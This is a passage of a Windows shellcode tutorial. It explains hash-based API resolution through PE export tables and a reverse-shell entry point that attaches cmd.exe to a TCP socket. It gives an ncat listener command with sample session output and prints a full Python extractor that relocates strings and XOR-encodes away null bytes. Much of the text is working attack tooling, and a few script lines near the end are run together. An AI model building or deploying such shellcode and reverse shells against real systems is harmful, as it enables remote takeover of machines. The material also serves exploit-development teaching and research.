            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);

        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
        .
        .
        .

To understand this piece of code you need to look at the PE file format specification; I will not go into much detail here. The important thing to note is that the addresses in the PE structures are RVAs (Relative Virtual Addresses), that is, addresses relative to the base address of the PE module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at address 400000h + 100h = 400100h. The module starts with the DOS_HEADER, which contains an RVA (e_lfanew) to the NT_HEADERS. The NT_HEADERS consist of the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory, which points to the various directories of the PE module. We are interested in the Export Directory; for details see https://msdn.microsoft.com/en-us/library/ms809762.aspx .
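The first hop of that header walk, from the DOS header to the NT headers via e_lfanew, can be tried on a synthetic buffer in Python. This is a minimal sketch: `build_fake_image` fabricates just enough bytes for the demonstration and is not a valid PE file, and both function names are made up here. The only layout facts relied on are that the image starts with "MZ", that e_lfanew is the dword at offset 3Ch, and that the NT headers start with the signature "PE\0\0".

```python
import struct

E_LFANEW_OFFSET = 0x3C   # position of e_lfanew inside IMAGE_DOS_HEADER


def build_fake_image(e_lfanew=0x80):
    """Fabricate a buffer with an MZ signature, an e_lfanew field and a PE signature."""
    image = bytearray(e_lfanew + 4)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, E_LFANEW_OFFSET, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    return bytes(image)


def find_nt_headers(image):
    """Return the RVA of the NT headers, checking both signatures on the way."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return e_lfanew


if __name__ == "__main__":
    dll_base = 0x400000                       # hypothetical load address
    rva = find_nt_headers(build_fake_image())
    print(hex(rva), hex(dll_base + rva))      # RVA and the corresponding VA
```

In the C++ code the same step is the expression baseAddress + dosHeader->e_lfanew.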

The C structure associated with the Export Directory is defined as follows:

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
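How the three arrays referenced by AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions cooperate is easier to see with plain lists. In this Python model the lists stand in for the in-memory arrays, and every name, ordinal and RVA is invented for the example; `resolve_export` is a hypothetical helper that compares names directly instead of hashes.

```python
def resolve_export(base, names, name_ordinals, function_rvas, wanted):
    """Look up `wanted` in the name table, use the parallel ordinal table to
    index the function table, and turn the resulting RVA into an address."""
    for i, name in enumerate(names):
        if name == wanted:
            ordinal = name_ordinals[i]          # same index i in both parallel arrays
            return base + function_rvas[ordinal]
    return None                                 # name not exported


if __name__ == "__main__":
    base = 0x10000000                           # hypothetical DllBase
    names = ["Alpha", "Beta", "Gamma"]          # AddressOfNames
    name_ordinals = [2, 0, 1]                   # AddressOfNameOrdinals
    function_rvas = [0x1000, 0x2000, 0x3000]    # AddressOfFunctions
    print(hex(resolve_export(base, names, name_ordinals, function_rvas, "Alpha")))
```

Note that the position of a name in the name table is not the index of its function: "Alpha" is first by name but maps to the third function entry through the ordinal table.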

DefineFuncPtr

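DefineFuncPtr is a handy macro that helps define a pointer to an imported function. Here is an example:

#define HASH_WSAStartup           0x2ddcd540

#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

DefineFuncPtr(WSAStartup);

WSAStartup is a function imported from ws2_32.dll, so HASH_WSAStartup is computed like this:

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

When the macro is expanded,

DefineFuncPtr(WSAStartup);

becomes

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

where decltype(WSAStartup) is the type of the function WSAStartup. This way we do not need to redefine the function prototype. Note that decltype was introduced in C++11.

Now we can call WSAStartup through My_WSAStartup.

Note that before importing a function from a module, we need to make sure that the module is already loaded in memory.

The easiest way to do that is to load the module with LoadLibrary:

DefineFuncPtr(LoadLibraryA);
My_LoadLibraryA("ws2_32.dll");

This works because LoadLibrary is imported from kernel32.dll which, as we said, is always present in memory.

We could also import GetProcAddress and use it to get the addresses of all the other functions we need, but that would be wasteful, because we would have to include the full names of the functions in the shellcode.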

entryPoint

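entryPoint is obviously the entry point of the shellcode, and it implements the reverse shell. First we import all the functions we need, and then we use them. The details are not important, and I must say that the winsock API is very cumbersome to use.

In a nutshell:

1. we create a socket,
2. connect the socket to 127.0.0.1:123,
3. create a process by executing cmd.exe,
4. attach the socket to the standard input, output and error of the process,
5. wait for the process to terminate,
6. when the process has ended, terminate the current thread.

Points 3 and 4 are performed at the same time by a single call to CreateProcess. Thanks to point 4, the attacker can listen on port 123 and, once connected, interact with the cmd.exe running on the remote machine through the socket, that is, the TCP connection.

To try this out, install ncat, run cmd.exe and at the prompt enter

ncat -lvp 123

This starts listening on port 123.

Then go back to Visual Studio 2013, select Release, build the project and run it. Go back to ncat and you should see something like the following:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

Now you can type whatever command you want. To exit, type exit.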

main

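Thanks to the linker option

Function Order: function_order.txt

and a function_order.txt whose first and only line is ?entryPoint@@YAHXZ, the function entryPoint is placed first in the shellcode.

The linker appears to honor the order of the functions in the source code, so we could instead have placed entryPoint before every other function. The main function comes last in the source code, so it is linked at the end of the shellcode, which marks where the shellcode ends. We will see how this is used when we describe the map file.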

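0x02 Python script

Introduction

Now that the executable containing the shellcode is ready, we need a way to extract the shellcode and fix it. This is not easy, so I wrote a Python script that:

1. extracts the shellcode

2. handles the relocations for the strings

3. fixes the shellcode by removing null bytes

I use PyCharm for this.

The script is only 392 lines long, but it is a little tricky, so I will explain it. Here is the code: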

# Shellcode extractor by Massimiliano Tomassoli (2015)
# NOTE: this script targets Python 2 (it relies on byte strings and integer division).

import sys
import os
import datetime
import pefile

author = 'Massimiliano Tomassoli'
year = datetime.date.today().year


def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]


def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)


def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]


def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None

    return shellcode_len


def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None


def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])


def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...

    delta = 21                                      # shellcode_start - here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)


def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)


def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''

    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]

    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)


def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))


def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))

        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                # Fixed: append to bytes_blocks (the flattened listing appended to
                # the set "bytes", which would raise a TypeError).
                bytes_blocks += [missing_bytes[0], num_blocks]
                break

    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])

    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) / 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes

    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)


def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))

    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return

    exe_file = sys.argv[1]
    map_file = sys.argv[2]

    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)

    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result

    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')

    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] 
Cannot fix the shellcode')  print('final shellcode length: %d/n' % len(fixed_shellcode))  print('char shellcode[] = ')  dump_shellcode(fixed_shellcode) main()

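The map file and `shellcode` length

We told the linker to produce a map file with the following options:

Debugging:
- Generate Map File: Yes (/MAP)

This tells the linker to generate a map file that describes the structure of the EXE.

* Map File Name: mapfile

The map file is mainly used to determine the length of the shellcode.

Here is the relevant part of the map file: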

    shellcode

    Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

    Preferred load address is 00400000

    Start         Length     Name                   Class
    0001:00000000 00000a9cH .text$mn                CODE
    0002:00000000 00000094H .idata$5                DATA
    0002:00000094 00000004H .CRT$XCA                DATA
    0002:00000098 00000004H .CRT$XCAA               DATA
    0002:0000009c 00000004H .CRT$XCZ                DATA
    0002:000000a0 00000004H .CRT$XIA                DATA
    0002:000000a4 00000004H .CRT$XIAA               DATA
    0002:000000a8 00000004H .CRT$XIC                DATA
    0002:000000ac 00000004H .CRT$XIY                DATA
    0002:000000b0 00000004H .CRT$XIZ                DATA
    0002:000000c0 000000a8H .rdata                  DATA
    0002:00000168 00000084H .rdata$debug            DATA
    0002:000001f0 00000004H .rdata$sxdata           DATA
    0002:000001f4 00000004H .rtc$IAA                DATA
    0002:000001f8 00000004H .rtc$IZZ                DATA
    0002:000001fc 00000004H .rtc$TAA                DATA
    0002:00000200 00000004H .rtc$TZZ                DATA
    0002:00000208 0000005cH .xdata$x                DATA
    0002:00000264 00000000H .edata                  DATA
    0002:00000264 00000028H .idata$2                DATA
    0002:0000028c 00000014H .idata$3                DATA
    0002:000002a0 00000094H .idata$4                DATA
    0002:00000334 0000027eH .idata$6                DATA
    0003:00000000 00000020H .data                   DATA
    0003:00000020 00000364H .bss                    DATA
    0004:00000000 00000058H .rsrc$01                DATA
    0004:00000060 00000180H .rsrc$02                DATA

    Address         Publics by Value              Rva+Base       Lib:Object

    0000:00000000       ___guard_fids_table        00000000     <absolute>
    0000:00000000       ___guard_fids_count        00000000     <absolute>
    0000:00000000       ___guard_flags             00000000     <absolute>
    0000:00000001       ___safe_se_handler_count   00000001     <absolute>
    0000:00000000       ___ImageBase               00400000     <linker-defined>
    0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
    0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
    0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
    0001:00000266       _main                      00401266 f   shellcode.obj
    0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
    0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
    0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
    0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
    <snip>

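The start of the map file tells us that section 1 is the .text section, which contains the code:

    Start         Length     Name                   Class
    0001:00000000 00000a9cH .text$mn                CODE

The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, which is our entryPoint function, and that main (called _main here) is the last of our functions. Since main is at offset 0x266 and entryPoint is at offset 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.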

Here is how this is done in Python:

    def get_shellcode_len(map_file):
        '''
        Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
        '''
        try:
            with open(map_file, 'r') as f:
                lib_object = None
                shellcode_len = None
                for line in f:
                    parts = line.split()
                    if lib_object is not None:
                        if parts[-1] == lib_object:
                            raise Exception('_main is not the last function of %s' % lib_object)
                        else:
                            break
                    elif (len(parts) > 2 and parts[1] == '_main'):
                        # Format:
                        # 0001:00000274  _main   00401274 f   shellcode.obj
                        shellcode_len = int(parts[0].split(':')[1], 16)
                        lib_object = parts[-1]

                if shellcode_len is None:
                    raise Exception('Cannot determine shellcode length')
        except IOError:
            print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
            return None
        except Exception as e:
            print('[!] get_shellcode_len: %s' % e)
            return None

        return shellcode_len

Extracting the shellcode

This part is straightforward. We know the length of the shellcode, and we know that the shellcode is located at the beginning of the .text section. Here is the code:

    def get_shellcode_and_relocs(exe_file, shellcode_len):
        '''
        Extracts the shellcode from the .text section of the file exe_file and the string
        relocations.
        Returns the triple (shellcode, relocs, addr_to_strings).
        '''
        try:
            # Extracts the shellcode.
            pe = pefile.PE(exe_file)
            shellcode = None
            rdata = None
            for s in pe.sections:
                if s.Name == '.text\0\0\0':
                    if s.SizeOfRawData < shellcode_len:
                        raise Exception('.text section too small')
                    shellcode_start = s.VirtualAddress
                    shellcode_end = shellcode_start + shellcode_len
                    shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
                elif s.Name == '.rdata\0\0':
                    <snip>

            if shellcode is None:
                raise Exception('.text section not found')
            if rdata is None:
                raise Exception('.rdata section not found')
    <snip>

I use the pefile module (download). The relevant part is the body of the if statement.

Strings and .rdata

As mentioned earlier, C/C++ code may contain strings. For example, our shellcode contains the following code:

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

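The string cmd.exe is located in the .rdata section, a read-only section that contains initialized data. The code refers to that string through an absolute address:

    00241152 50                   push        eax
    00241153 8D 44 24 5C          lea         eax,[esp+5Ch]
    00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h
    00241162 50                   push        eax
    00241163 52                   push        edx
    00241164 52                   push        edx
    00241165 52                   push        edx
    00241166 6A 01                push        1
    00241168 52                   push        edx
    00241169 52                   push        edx
    0024116A 68 18 21 24 00       push        242118h         <------------------------
    0024116F 52                   push        edx
    00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi
    00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi
    0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi
    00241185 FF 54 24 34          call        dword ptr [esp+34h]

As we can see, the absolute address of cmd.exe is 242118h. Note that the address is part of a push instruction and is itself located at 24116Bh. If we examine the executable file (shellcode.exe) with a file editor, we see the following:

56A: 68 18 21 40 00           push        000402118h

Here 56Ah is the offset in the file. The corresponding virtual address (i.e. the address in memory) is 40116Ah, because the image base is 400000h. This is the preferred address at which the executable should be loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the preferred base address. If the executable is loaded at a different base address, however, the instruction needs to be fixed. How does the Windows loader know which locations of the executable contain addresses that need to be fixed? The PE file contains a Relocation Directory, which in our case points to the .reloc section. This directory contains the RVAs of all the locations that need to be fixed.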
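As a small worked example of this fix-up, the Python 3 sketch below rebases the operand of the push instruction. The actual base 240000h is inferred from the addresses in the disassembly listing, and the helper name `rebase` is only illustrative, not something the Windows loader or the script exposes.

```python
PREFERRED_BASE = 0x400000   # preferred load address from the map file
ACTUAL_BASE = 0x240000      # inferred from the listing (00241152, ...)

def rebase(address, preferred_base, actual_base):
    """Adjust an absolute address for a module loaded at actual_base."""
    return (address - preferred_base + actual_base) & 0xFFFFFFFF

# Operand of "push 402118h" as stored in the file, after relocation.
fixed = rebase(0x402118, PREFERRED_BASE, ACTUAL_BASE)
print(hex(fixed))   # 0x242118, the operand seen in the listing
```

The same delta (actual base minus preferred base) is added to every location listed in the Relocation Directory.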

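We can inspect this directory and look for the addresses of locations that

1. are contained in the shellcode (i.e. lie between .text:0 and the main function, main excluded),
2. contain pointers to data in .rdata.

For example, among many other addresses, the Relocation Directory will contain the address 40116Bh, which locates the last four bytes of the instruction push 402118h. These bytes form the address 402118h, which points to the string cmd.exe contained in .rdata (which starts at address 402000h).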
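The two criteria can be sketched in plain Python 3, without pefile. The function name `string_relocs`, its parameters, the made-up second relocation entry and the .rdata size are assumptions for illustration; only the values 40116Bh, 402118h, 402000h and the length 0x266 come from the text.

```python
import struct

def string_relocs(reloc_rvas, text, text_rva, shellcode_len,
                  image_base, rdata_rva, rdata_size):
    """Return offsets (from the shellcode start) of relocated DWORDs that
    lie inside the shellcode and point into .rdata."""
    result = []
    for rva in reloc_rvas:
        off = rva - text_rva
        # Criterion 1: the whole DWORD lies inside the shellcode.
        if not (0 <= off and off + 4 <= shellcode_len):
            continue
        target = struct.unpack_from('<I', text, off)[0] - image_base
        # Criterion 2: the DWORD points into .rdata.
        if rdata_rva <= target < rdata_rva + rdata_size:
            result.append(off)
    return result

# Toy .text image: only the operand of "push 402118h" is filled in.
text = bytearray(0x1000)
struct.pack_into('<I', text, 0x16B, 0x402118)

relocs = string_relocs(
    reloc_rvas=[0x116B, 0x14E0],   # 0x14E0: hypothetical entry past _main
    text=bytes(text), text_rva=0x1000, shellcode_len=0x266,
    image_base=0x400000, rdata_rva=0x2000,
    rdata_size=0x1000)             # assumed size of .rdata
print([hex(o) for o in relocs])
```

Only the entry at RVA 116Bh survives both checks; the second entry is rejected because it lies beyond the 0x266 bytes of the shellcode.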

Let's look at the function get_shellcode_and_relocs. In the first part we extract the .rdata section:

    def get_shellcode_and_relocs(exe_file, shellcode_len):
        '''
        Extracts the shellcode from the .text section of the file exe_file and the string
        relocations.
        Returns the triple (shellcode, relocs, addr_to_strings).
        '''
        try:
            # Extracts the shellcode.
            pe = pefile.PE(exe_file)
            shellcode = None
            rdata = None
            for s in pe.sections:
                if s.Name == '.text\0\0\0':
                    <snip>
                elif s.Name == '.rdata\0\0':
                    rdata_start = s.VirtualAddress
                    rdata_end = rdata_start + s.Misc_VirtualSize
                    rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

            if shellcode is None:
                raise Exception('.text section not found')
            if rdata is None:
                raise Exception('.rdata section not found')

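Adding the loader to the shellcode

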